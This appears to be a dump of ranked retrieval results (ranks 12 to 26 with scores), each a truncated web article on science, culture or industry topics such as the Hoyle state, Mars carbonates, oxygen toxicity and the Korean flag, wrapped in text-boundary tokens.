of a cloudy diffuse carbon nucleus. And it does not occur individually, only together with other forms of carbon. \”This is as if you wanted to analyze a radio signal whose main transmitter and several slave transmitters are interfering with each other,\” explained Prof. Dr. Evgeny Epelbaum (Institute of Theoretical Physics II at Ruhr-Universität Bochum). The main transmitter is the stable carbon nucleus from which humans – among others – are made. \”But we are interested in one of the unstable, energy-rich carbon nuclei; so we have to separate the weaker radio transmitter somehow from the dominant signal by means of a noise filter.\” + +What made this possible was a new, improved calculating approach the researchers used that allowed calculating the forces between several nuclear particles more precisely than ever. And in JUGENE, the supercomputer at Forschungszentrum Jülich, a suitable tool was found. It took JUGENE almost a week of calculating. The results matched the experimental data so well that the researchers can be certain that they have indeed calculated the Hoyle state. + +More about how the Universe came into existence + +\”Now we can analyze this exciting and essential form of the carbon nucleus in every detail,\” explained Prof. Meißner. \”We will determine how big it is, and what its structure is. And it also +================================================================================ +Rank = 12; Score = 2326528.0 +<|begin_of_text|>In 2008, a movie was released in Japan with the title “Genkai in a Black Company” [1], depicting the life of a 26-year-old struggling to make a living in the gruelling conditions a so-called “black company”. The term is Japanese slang for companies with long hours, dreadful working conditions and miserable pay that exploit their employees beyond the legal limit — last-ditch options for those who can't get better work. The company in the movie, though, was not the kind you might associate with such a backward, sweatshop-like workplace. It was an IT company. + +Not surprisingly, young Japanese are none too keen [2] to work in such coding sweatshops, which are all too real (the movie itself is based on a true story [3], and a not uncommon one). It doesn't help that programmers are associated in the public eye with social ineptness [4], and that the programming task itself is often viewed as grunt work, or not understood at all [5] [ja]. Young Japanese are steadily fleeing the industry, and the exodus is one of the main reasons why Japan is losing its competitiveness in the new digital age [6]. + +A personal perspective + +37-year-old software architect Ryo Asai [7] (@ryoasai74 [8]) and his blog “Becoming a Master Programmer [9]” (達人プログラマーを目指して) [jp] offer a rare counterpoint to this gloomy picture, and a unique window onto the state of the IT industry in Japan. In his profile, the blogger explains: + +世間ではプログラマーは忙しいわりに報酬の少ない報われない職業という意見もあるようですが、インターネットで気軽に情報を発信したり、オープンソースの コミュニティに参加して一緒に開発したり、プログラマーが活躍できる場所は以前と比べてずっと広がっているということに最近ようやく気づきました。勉強の 材料もインターネットからほとんど無料で手に入る時代ですし、やはりプログラミングが好きな人間にとっては本当に魅力的な仕事であると思います。IT業界 の現在や未来には悲観的な意見が多く、特にプログラマーに対しては魅力的な職業でないと +================================================================================ +Rank = 13; Score = 2293760.0 +<|begin_of_text|>Scientists may be closer to solving the mystery of how Mars changed from a world with surface water billions of years ago to the arid Red Planet of today. + +A new analysis of the largest known deposit of carbonate minerals on Mars suggests that the original Martian atmosphere may have already lost most of its carbon dioxide by the era of valley network formation. + +"The biggest carbonate deposit on Mars has, at most, twice as much carbon in it as the current Mars atmosphere," said Bethany Ehlmann of the California Institute of Technology and NASA Jet Propulsion Laboratory, both in Pasadena. "Even if you combined all known carbon reservoirs together, it is still nowhere near enough to sequester the thick atmosphere that has been proposed for the time when there were rivers flowing on the Martian surface." + +Carbon dioxide makes up most of the Martian atmosphere. That gas can be pulled out of the air and sequestered or pulled into the ground by chemical reactions with rocks to form carbonate minerals. Years before the series of successful Mars missions, many scientists expected to find large Martian deposits of carbonates holding much of the carbon from the planet's original atmosphere. Instead, these missions have found low concentrations of carbonate distributed widely, and only a few concentrated deposits. By far the largest known carbonate-rich deposit on Mars covers an area at least the size of Delaware, and maybe as large as Arizona, in a region called Nili Fossae. + +Christopher Edwards, a former Caltech researcher now with the U.S. Geological Survey in Flagstaff, Arizona, and Ehlmann reported the findings and analysis in a paper posted online by the journal Geology. Their estimate of how much carbon is locked into the Nili Fossae carbonate deposit uses observations from numerous Mars missions, including the Thermal Emission Spectrometer (TES) on NASA's Mars Global Surveyor orbiter, the mineral-mapping Compact Reconnaissance Imaging Spectrometer for Mars (CRISM) and two telescopic cameras on NASA's Mars Reconnaissance Orbiter, and the Thermal Emission Imaging System (THEMIS) on NASA's Mars Odyssey orbiter. + +Edwards and Ehlmann compare their tally of sequestered carbon at Nili Fossae to what would be needed to account for an early Mars atmosphere dense enough to sustain surface waters during the period when flowing rivers left their mark by cutting extensive river-valley networks. By their estimate, it would require more than 35 carbonate deposits the size of the one examined at Nili Fossae. They deem it unlikely that so many large deposits have been overlooked +================================================================================ +Rank = 14; Score = 2244608.0 +<|begin_of_text|>[+]Enlarge Experiments and computations suggest that oxygen-terminated edges of BN (green and gray) can abstract hydrogen from propane to begin to form propene (product not shown). Credit: Science + +Boron nitride has made news repeatedly in recent years as a material with an appealing mix of structural and physical properties. But it hasn’t made news as a catalyst, and certainly not one with the potential to drive global-scale industrial chemical processes. + +That all just changed. Researchers have demonstrated that boron nitride (BN) selectively catalyzes conversion of propane to propene, a valuable chemical used worldwide on the multimillion-ton-per-year scale (Science 2016, DOI: 10.1126/science.aaf7885). + +Researchers have mainly studied nanotube and one-atom-thick forms of BN that boast high strength, heat resistance, and unique electronic properties. A team at the University of Wisconsin, Madison, including Joseph T. Grant and Ive Hermans, have shown that BN unexpectedly works well as a catalyst that drives oxidative dehydrogenation of propane (ODHP). This process strips hydrogen from propane to form propene and oxidizes the hydrogen to form water. + +Manufacturers typically produce propene by “cracking” large hydrocarbons in naphtha, a component of crude oil, with steam. But steam cracking plants have started to use shale gas instead of naphtha as a feedstock, a process that yields less propene. This has forced manufacturers to look for alternative ways to boost propene output. + +Several dehydrogenation methods that do not use an oxidizer can drive the propane-to-propene reaction. But these methods gunk up the catalysts, shortening their lifetimes. Also, nonoxidative dehydrogenation and steam cracking are both highly endothermic, and therefore energy intensive. + +In contrast, ODHP is exothermic and can run efficiently at hundreds of degrees lower than the other processes. According to industry estimates, a reaction running at relatively low temperatures such as these could reduce energy input by 45%. But the many ODHP catalysts that have been studied overoxidize propene, forming unwanted yet thermodynamically stable CO and CO 2. + +Not BN. The Wisconsin team finds that in the presence of oxygen, BN nanotubes and hexagonal-BN convert propane to propene and generate ethene, a valuable commodity, as the main by-product. Under one set of conditions, the reaction generated roughly 80% propene and 12 +================================================================================ +Rank = 15; Score = 2056192.0 +<|begin_of_text|>There may be enough oxygen in the waters of Jupiter's moon Europa to support millions of tons worth of fish, according to a new study. And while nobody is suggesting there might actually be fish on Europa, this finding suggests the Jovian satellite could be capable of supporting the kinds of life familiar to us here on Earth, if only in microbial form. + +Europa, which is roughly the size of Earth's moon, is enveloped by a global ocean about 100 miles deep (160 km), with an icy crust that may be only a few miles thick. From what we know of Earth, where there is water, there is a chance at life, so for many years scientists have speculated that this Jovian moon could support extraterrestrials. + +As we learned more about Jupiter's effect on its moons, the possibility for life on Europa grew even more likely. Studies showed the moon could have enough oxygen to support the kind of life we are most familiar with on Earth. + +IN PICTURES: Jupiter + +The ice on the surface, like all water, is made from hydrogen and oxygen, and the constant stream of radiation pouring in from Jupiter reacts with this ice to form free oxygen and other oxidants such as hydrogen peroxide. The reactivity of oxygen is key to generating the energy that helped multi-cellular life flourish on our planet. + +Still, researchers had thought there was no effective method for delivering any of this oxygen-rich matter into Europa's ocean. Scientists had assumed the primary way for surface materials to migrate downward was from the impacts it would suffer from cosmic debris, which regularly bombards everything in our solar system. [Photos of Jupiter's moons.] + +However, past calculations suggested that even after a few billion years, such "impact gardening" would never lead to an oxygenated layer more than some 33 feet (10 meters) deep into the ice shell, nowhere far enough down to reach the underlying ocean. + +However, the new study suggests this oxygen-rich layer could be far thicker than before thought, potentially encompassing the entire crust. The key is looking at other ways to stir Europa's crust, explained researcher Richard Greenberg, a planetary scientist at the University of Arizona's Lunar and Planetary Laboratory at Tucson. + +The gravitational pull Europa experiences from Jupiter leads to tidal forces roughly 1,000 times stronger than what Earth feels from our moon, flexing and heating Europa and making it very active geologically. This could explain why its surface appears no older than 50 million years old — its surface underwent complete turnover in that time +================================================================================ +Rank = 16; Score = 2023424.0 +<|begin_of_text|>"Taegukgi" and "Taegeukgi" redirect here. For the 2004 South Korean movie, see Taegukgi (film) + +Republic of Korea Name Taegukgi / Taegeukgi + +(Hangul: 태극기 ) + +(Hanja: 太極旗 Use National flag and ensign Proportion 2:3 Adopted January 27, 1883 (original version, used by the Joseon dynasty) + +June 29, 1942 (Provisional Government of the Republic of Korea) + +October 15, 1949 (as the flag of South Korea) [1] + +May 30, 2011 (current version) Design A white field with a red and blue taegeuk in the center that is surrounded by four varying groups of short black bars toward each corner Variant flag of Republic of Korea Use Naval jack + +The flag of South Korea, also known as the Taegukgi (also spelled as Taegeukgi, literally "supreme ultimate flag"), has three parts: a white rectangular background, a red and blue Taegeuk, symbolizing balance, in its center, and four black trigrams selected from the original eight, one toward each corner. + +Symbolism [ edit ] + +The flag's background is white, a traditional color in Korean culture. White was common in the daily attire of 19th-century Koreans, and it still appears in contemporary versions of traditional Korean garments, such as the hanbok. The color represents peace and purity.[2] + +The circle in the middle is derived from the philosophy of um-yang (yin-yang from China) and represents balance in the universe. The red half represents positive cosmic forces, and the blue half represents the opposing negative cosmic forces. + +Together, the trigrams represent movement and harmony as fundamental principles. Each trigram (hangeul: 괘 [gwae]; hanja: 卦) represents one of the four classical elements,[3] as described below: + +Trigram Korean name Celestial body Season Cardinal direction Virtue Family Natural element Meaning ☰ geon + +( 건 / 乾 heaven + +( 천 / 天 spring + +( 춘 / 春 east + +( 동 / 東 humanity + +( 인 / 仁 father + +( 부 / 父 heaven + +( 천 / 天 justice + +( 정의 / 正義 ) ☲ ri + +( 리 / 離 sun + +( 일 / 日 autumn + +( 추 / 秋 south + +( 남 / +================================================================================ +Rank = 17; Score = 2023424.0 +<|begin_of_text|>Toxic effects of breathing in oxygen at high concentrations + +Oxygen toxicity Synonyms Oxygen toxicity syndrome, oxygen intoxication, oxygen poisoning In 1942–43 the UK Government carried out extensive testing for oxygen toxicity in divers. The chamber is pressurised with air to 3.7 bar. The subject in the centre is breathing 100% oxygen from a mask. Specialty Emergency medicine + +Oxygen toxicity is a condition resulting from the harmful effects of breathing molecular oxygen (O + +2 ) at increased partial pressures. Severe cases can result in cell damage and death, with effects most often seen in the central nervous system, lungs, and eyes. Historically, the central nervous system condition was called the Paul Bert effect, and the pulmonary condition the Lorrain Smith effect, after the researchers who pioneered the discoveries and descriptions in the late 19th century. Oxygen toxicity is a concern for underwater divers, those on high concentrations of supplemental oxygen (particularly premature babies), and those undergoing hyperbaric oxygen therapy. + +The result of breathing increased partial pressures of oxygen is hyperoxia, an excess of oxygen in body tissues. The body is affected in different ways depending on the type of exposure. Central nervous system toxicity is caused by short exposure to high partial pressures of oxygen at greater than atmospheric pressure. Pulmonary and ocular toxicity result from longer exposure to increased oxygen levels at normal pressure. Symptoms may include disorientation, breathing problems, and vision changes such as myopia. Prolonged exposure to above-normal oxygen partial pressures, or shorter exposures to very high partial pressures, can cause oxidative damage to cell membranes, collapse of the alveoli in the lungs, retinal detachment, and seizures. Oxygen toxicity is managed by reducing the exposure to increased oxygen levels. Studies show that, in the long term, a robust recovery from most types of oxygen toxicity is possible. + +Protocols for avoidance of the effects of hyperoxia exist in fields where oxygen is breathed at higher-than-normal partial pressures, including underwater diving using compressed breathing gases, hyperbaric medicine, neonatal care and human spaceflight. These protocols have resulted in the increasing rarity of seizures due to oxygen toxicity, with pulmonary and ocular damage being mainly confined to the problems of managing premature infants. + +In recent years, oxygen has become available for recreational use in oxygen bars. The US Food and Drug Administration has warned those suffering from problems such as heart or lung disease not to use oxygen bars. Scuba divers use breathing gases containing up to 100% oxygen, and should have specific +================================================================================ +Rank = 18; Score = 2023424.0 +<|begin_of_text|>Victoria123 Registered User + +Join Date: Feb 2015 Location: Toronto-Vancouver Posts: 1,222 Likes (Received): 2028 + +Shilla Dynasty Excavation and Restoration Project - 신라왕경 복원 정비사업 + +Pics below - Hwangryongsa Temple - 황룡사 - the golden dragon temple. Standing a whopping 9 floors from the ground this + +81m tall pagoda will be the largest of its kind in North East Asia. Not to mention, backed up by accurate historical evidence, and ancient materials. + +Pic above - Wulsung- 월성 + +Pic below - Dong-goong & Wolji - 동궁과 월지 currently known as Anapji (great tourist attracion) (안압지) + +Currently archaeologists are excavating the sites below : + +The construction for 월정교 (Wol Jung Gyo Bridge) is already underway + +pic below is the rendering for this romantic royal bridge + +Pic below - Bridge finishing up : Just need to construct the Moon-Ru (문루) which are the two majestic gates at each end of the bridge. + +All the architectural details applied to these buildings had enough historical evidence for the ministry to approve the restoration. Perhaps an equally significant fact is that all the historical structures will have excavated material in them which renders it an "actually historical building" rather than a theme park, like the one built in Buyeo. + +Along with all the other existing historical attractions, the revealing of Shilla's 1000 year majesty will advance Gyung-Ju city's world recognition, and reputation. By 2025 the South Korean government is collaborating with Gyeongsang Nam Do to restore the hidden treasures of Shilla Dynasty at GyungJu city/ Shilla Dynasty lasted for more than 1000 years which makes it one of the oldest not just in Korean but human history as well. When the Shilla Dynasty was at its greatest peak it had the, the 4th largest city in the world, and had enormous economic, and social influence in Asia. Records show that the people of Shilla traveled as far as Persia (modern day Iran). In fact a Shilla princess married a Persian prince which demonstrates the political influence the ancient kingdom had at the time.Pics below - Hwangryongsa Temple - 황룡사 - the golden dragon temple. Standing a whopping 9 floors from the ground this81m tall pagoda will be the largest of its kind in North East Asia. Not to mention, backed +================================================================================ +Rank = 19; Score = 1998848.0 +<|begin_of_text|>Oxygen on a planet might be a sign of life, but in two peculiar white dwarf stars it could indicate a narrow escape from a violent death. Their oxygen content marks them as failed stellar bombs – the remnants of stars that almost went supernova. + +The new stars are among thousands of white dwarfs picked up by the Sloane Digital Sky Survey. Like all white dwarfs they are the dead, cooling cores left behind by mainstream stars, and are mainly made of helium. Usually the second most plentiful ingredient is carbon – but when a group of astronomers led by Boris Gänsicke at the University of Warwick, UK, analysed the spectrum of light from these two white dwarfs, they found that the objects hold far more oxygen than carbon. + +“It’s extreme – these things look very different from any white dwarfs we’ve seen before,” says team member Danny Steeghs. + +Creating so much oxygen requires a nuclear furnace fiercer than that needed for a carbon-rich mixture, so the stars that spawned these white dwarfs must have been hot and massive. Simulations suggest that they must have been almost too big to end their days gently – any larger, and they would have grown a core so massive and dense that it would inevitably have collapsed, releasing enough energy to blow the rest of the star apart in a supernova explosion. + +Advertisement + +The critical mass needed to create such a supernova is thought to be between 7 and 10 times that of the sun. These almost-bombs might help astrophysicists to pin down the threshold more precisely, and Gänsicke hopes to use the Very Large Telescope in Chile’s Atacama Desert to get a clearer spectrum and reveal their chemistry in more detail. “It will give the theoreticians something to work with,” he says. + +Journal reference: Science, DOI: 10.1126/science.1180228<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 20; Score = 1859584.0 +<|begin_of_text|>/ + +Otomatik kollu bariyer sistemleri endüstriyel alanlarda sıkça kullanılan sistemlerdir. Yabancı araç girişini kontrol eden kollu bariyer sistemi tek ve çift taraflı olarak ta kullanılabilir. Özellikle iş yerleri ve otoparklar için sıkça kullanılan bu otomatik bariyer şeklindeki ürünleri firmalar tercih etmektedirler. Uzaktan kumanda ve kartlı geçiş sistemleri de bulunmaktadır. Araçların büyüklüğüne göre bariyer sistemi de buna göre büyüklükte yapılır. + +Kollu bariyer sistemleri estetik görünümü sağlam yapısı ile kötü hava koşullarında çalışabilmektedir. Yağmurda, karda, fırtınada, aşırı sıcaklarda ve dolu yağmurlarında çalışabilmektedir. Geceleri ise üzerindeki ledler sayesinde kolayca fark edilebilirler. Araç geçtikten sonra bariyer otomatik kapanma sistemi ile zaman ayarlı olarak kapatılabilmektedir. Ayrıca elektrik kesintilerinde otomatik bariyer kolunun manuel kullanımı mekanik olarak ta kullanılabilir. Güvenliğin her şeyden önemli olduğu bilinciyle emniyet fotoseli ve manyetik loop dedektörü bağlantısı mümkün olmaktadır. + +Bariyer sistemleri toplu alanlarda özellikle de çevre düzenleme alanlarında geniş girişlerin sağlanması ve araç kontrollerinin yapılması için yaygın olarak kullanılan bariyer sistemi yoğun kullanımlar için birebirdir. Bariyerlerin üzerindeki fotoseller sayesinde araç geçişi tespit edilip araç geçene kadar bariyer kolunun indirilmesi önlenir. Böylece olası kazalar önlenmiş olur ve kazalara sebebiyet vermez. + +Egebeta otomatik kollu bariyer sistemlerinde rakiplerinden bir adım önde olmayı kendisine ilke edinmiş ve sizlere bu şekilde hizmetler sunmaktadır.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 21; Score = 1785856.0 +<|begin_of_text|>Some say the world will end in fire, some in ice. One more reason to hold with those who favor fire: USC scientists have found that rock and soil breakdown in glaciers generates more acidity and releases more carbon than other forms of natural weathering, according to a new study. + +Perhaps most interestingly, researchers say, it is the elevated oxidation of pyrite, popularly known as “fool’s gold,” in the glacial breakdown that produces increased acidity and leads to CO 2 escaping to the atmosphere from rivers and the oceans. + +“CO 2 has gone up and down repeatedly over time, and we don’t really know why. Our study suggests that this process may play a meaningful role,” said Joshua West, professor of earth sciences and environmental studies at the USC Dornsife College of Letters, Arts and Sciences and the study’s corresponding author. + +This means that, over very long earth cycles, nature is self-regulating against future runaway glaciation. + +Graduate researcher Mark Torres of USC Dornsife’s Department of Earth Sciences served as the study’s lead author, which published Monday in the Proceedings of the National Academy of Science. + +The fool’s gold standard + +As oxidized pyrite slowly makes its way from glaciated water to the ocean, it creates an increase in CO 2 in the atmosphere. + +We found glacial rivers are rich in dissolved sulfur, and when they’re rich in sulfur, we have found that this tends to be because of the weathering of pyrite or fool’s gold. Mark Torres + +“We found glacial rivers are rich in dissolved sulfur, and when they’re rich in sulfur, we have found that this tends to be because of the weathering of pyrite or fool’s gold,” Torres said. “When these kinds of rivers flow into the ocean, the sulfur causes the transfer of carbon that was previously stored in rocks and the ocean back into the atmosphere.” + +To measure the amount of carbon released by glacial weathering, Torres, West and the rest of the team analyzed a large database of 7,700 river glacier drainage samples. + +The database was made up of a variety of samples collected from all over the world: Argentina, Canada, Greenland, Nepal, Iceland and the United States, among others. Included in the database were earlier field samples that had been collected by West and study co-author Jens Hartmann of the University of Hamburg. + +The glacial river samples consistently demonstrated a lower alkalinity-to-carbon ratio than other river samples, which is indicative of pyrite weathering and carbon dioxide release +================================================================================ +Rank = 22; Score = 1761280.0 +<|begin_of_text|>Steven McCloskey, co-founder of a new virtual reality startup, manipulates objects in an immersive environment. + +Virtual reality (VR) headsets such as the Oculus Rift will line store shelves this holiday season, and UC San Diego alumni startup Nanome, Inc. plans to capitalize on that by creating VR apps for the consumer market, the classroom, and beyond. + +Nanome co-founder Steven McCloskey was part of the first graduating class of NanoEngineering at UC San Diego when he received his bachelor’s degree in 2015. Frustrated by the lack of tools available to nanoengineers for complex 3D modeling and simulation at the nanoscale, he set out to try and rectify the problem. He and colleagues built the first molecular visualization, modeling and simulation tool for today’s VR platforms called nano-one. The application allows users to build molecules with carbon, oxygen, nitrogen and hydrogen atoms. + +“Our goal is to provide the tools necessary to help people build new proteins and molecules and eventually also simulate their interactions,” said McCloskey. “You can see how the world works at this fundamental level, and re-make it.” + +Why VR? Everything is made out of atoms—cosmetics, computer hardware, everything. Take a chair, for example. A chair can’t just look like a chair, it has to act like one. If you’re going to be manipulating things in 3D, you also need to be able to change the material properties of an object, which is dictated by structures at the nanoscale level. + +McCloskey said he believes nanoscale virtual reality represents the future of engineering. + +“UC San Diego is where this has to happen—we have a NanoEngineering department, VR experts, Protein Databank, interdisciplinary researchers, and we’re located in Biotech Beach,” he said. + +Nano-one is now being tested in the UC San Diego Chemistry Department and in the consumer market for workflow integration, modeling precision, and optimal pattern-recognition and discovery. + +As nano-one was being developed, McCloskey and his colleagues had an idea for another VR tool that would help engineers with math. + +“When I was in Vector Calculus as a NanoEngineering major, I wanted better 3D graphics to go along with the instruction,” said McCloskey. + +Nanome co-founders Steven McCloskey and Keita Funakawa + +The team piloted a VR 3D-graphing calculator in Math20E over the summer. The calculator, called Calcflow, features intuitive ways for +================================================================================ +Rank = 23; Score = 1703936.0 +<|begin_of_text|>One of the oldest questions on earth is how all this crazy life started. Where did you come from? How about your office plant, or your cat? For a long time, our only working idea was that gods from the heavens had provided the seed of life. We may, at least, have been looking into the correct direction: researchers at UC Berkeley recently added evidence to the idea that life on Earth came from a comet. + +The idea goes like this: the so-called “building blocks of life” on this planet are called dipeptides. And the real mystery is where these dipeptides came from. The Berkeley scientists’ research suggests that dipeptides could have formed on interplanetary dust and been carried down to earth on a comet. Berkeley writes: + +Chemists from the University of California, Berkeley, and the University of Hawaii, Manoa, showed that conditions in space are capable of creating complex dipeptides – linked pairs of amino acids – that are essential building blocks shared by all living things. The discovery opens the door to the possibility that these molecules were brought to Earth aboard a comet or possibly meteorites, catalyzing the formation of proteins (polypeptides), enzymes and even more complex molecules, such as sugars, that are necessary for life. + +Or, in the paper itself, the authors put it this way: + +Our results indicate that the radiation-induced, non-enzymatic formation of proteinogenic dipeptides in interstellar ice analogs is facile. Once synthesized and incorporated into the ”building material” of solar systems, biomolecules at least as complex as dipeptides could have been delivered to habitable planets such as early Earth by meteorites and comets, thus seeding the beginning of life as we know it. + +They figured this out by making a mini-comet in the lab. Combining carbon dioxide, ammonia and other chemicals like methane at super cold temperatures (space is pretty cold), they created a tiny comet-like thing. Then they added the lab equivalent of cosmic rays, zapping the mini-comet with electrons. What they saw was that the combination of these high energy electrons and the comet they had built created organic molecules like amino acids and dipeptides. + +The idea is that this reaction happened on its own in space, and those dipeptides were carried down to earth on that icy comet. In other words, the necessary blocks of life might really have descended to Earth from the sky. + +More from Smithsonian.com: + +The Origins of Life<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 24; Score = 1679360.0 +<|begin_of_text|>Perchloric acid is a mineral acid with the formula HClO 4. Usually found as an aqueous solution, this colorless compound is a stronger acid than sulfuric acid and nitric acid. It is a powerful oxidizer when hot, but aqueous solutions up to approximately 70% by weight at room temperature are generally safe, only showing strong acid features and no oxidizing properties. Perchloric acid is useful for preparing perchlorate salts, especially ammonium perchlorate, an important rocket fuel component. Perchloric acid is dangerously corrosive and readily forms potentially explosive mixtures. + +Production [ edit ] + +Perchloric acid is produced industrially by two routes. The traditional method exploits the high aqueous solubility of sodium perchlorate (209 g/100 mL of water at room temperature). Treatment of such solutions with hydrochloric acid gives perchloric acid, precipitating solid sodium chloride: + +NaClO 4 + HCl → NaCl + HClO 4 + +The concentrated acid can be purified by distillation. The alternative route, which is more direct and avoids salts, entails anodic oxidation of aqueous chlorine at a platinum electrode.[5][6] + +Laboratory preparations [ edit ] + +Treatment of barium perchlorate with sulfuric acid precipitates barium sulfate, leaving perchloric acid. It can also be made by mixing nitric acid with ammonium perchlorate and boiling while adding hydrochloric acid. The reaction gives nitrous oxide and perchloric acid due to a concurrent reaction involving the ammonium ion and can be concentrated and purified significantly by boiling off the remaining nitric and hydrochloric acids. + +Properties [ edit ] + +Anhydrous perchloric acid is an unstable oily liquid at room temperature. It forms at least five hydrates, several of which have been characterized crystallographically. These solids consist of the perchlorate anion linked via hydrogen bonds to H 2 O and H 3 O+ centers[7] Perchloric acid forms an azeotrope with water, consisting of about 72.5% perchloric acid. This form of the acid is stable indefinitely and is commercially available. Such solutions are hygroscopic. Thus, if left open to the air, concentrated perchloric acid dilutes itself by absorbing water from the air. + +Dehydration of perchloric acid gives the anhydride dichlorine heptoxide:[8] + +2 HClO 4 + P +================================================================================ +Rank = 25; Score = 1630208.0 +<|begin_of_text|>Element Language of origin Original word Meaning Symbol origin Description + +1 Hydrogen H Greek via Latin and French ὕδωρ (root: ὑδρ-) + -γενής (-genes) water + begetter descriptive From French hydrogène[1] and Latin hydro- and -genes, derived from the Greek ὕδωρ γείνομαι (hydor geinomai), meaning "Ι beget water". + +2 Helium He Greek ἥλιος (hélios) sun astrological; + +mythological Named after the Greek ἥλιος (helios), which means "the sun" or the mythological sun-god.[2] It was first identified by its characteristic emission lines in the Sun's spectrum. + +3 Lithium Li Greek λίθος (lithos) stone From Greek λίθος (lithos) "stone", because it was discovered from a mineral while other common alkali metals (sodium and potassium) were discovered from plant tissue. + +4 Beryllium Be Sanskrit, Pali, and Prakrit via Greek, Latin, Old French, and Middle English City of Belur via Greek βήρυλλος (beryllos) a blue-green spar (beryllium aluminium cyclosilicate, Be 3 Al 2 (SiO 3 ) 6 ). Possibly related to the name of Belur. descriptive (colour): beryl βήρυλλος beryllos, denoting beryl, which contains beryllium.[3] The word is derived (via Latin: beryllus and French: béryl) from the Greek βήρυλλος, bērullos, a blue-green spar, from Prakrit veruliya (वॆरुलिय‌), from Pāli veḷuriya (वेलुरिय); veḷiru (भेलिरु) or, viḷar (भिलर्), "to become pale," in reference to the pale semiprecious gemstone beryl.[4] The word is ultimately derived from the Sanskrit word वैडूर्य vaidurya, which might be related to the name of the Indian city of Belur.[5] + +6 Carbon C Latin via French charbone charcoal Latin carbo From the French, charbone, which in turn came from Latin carbō, which means "charcoal" and is related to carbōn +================================================================================ +Rank = 26; Score = 1523712.0 +<|begin_of_text|>By Andy May + +18O is a rare isotope of oxygen. The ratio of 18O to the normal 16O in foraminifera fossils (“forams”) can be used to estimate paleo-ocean temperatures. Higher values mean lower temperatures. A recent article on geologypage.com (here) led me to Bernard, et al., 2017, which has experimental data that suggest 18O concentrations can be altered in fossils by solid-state diffusion after fossilization. This can corrupt the measurement and the resulting calculated temperature. According to Bernard and colleagues, the 18O concentration alteration is visually imperceptible, so one cannot tell the fossil has been altered by visual inspection. If their results are valid, how will this impact our view of climate history? + +Fractionation of 18O and 16O takes place during evaporation and precipitation, so another problem for this paleothermometer is glacier and polar ice, which delay the return of excess 16O in water vapor to the ocean. Correlations of δ18O to temperature are for an ice-free Earth, the formation of polar ice caps and mountain glaciers have an additional effect on δ18O. In figure 1, the δ18O record and the δ13C record are shown for the Cenozoic (65 million years ago to the present day). + +Figure 1 (source: Zachos, et al., 2001) + +The red temperature scale at the bottom of figure 1 is only applicable when there is no significant permanent polar ice, Zachos, et al. call this the ice-free temperature. It is applicable prior to about 33 million years ago when Antarctica and the North Pole were ice-free, at least in their respective summer months. Once permanent ice caps appear, they remove 16O from the oceans indefinitely and lead to a large positive 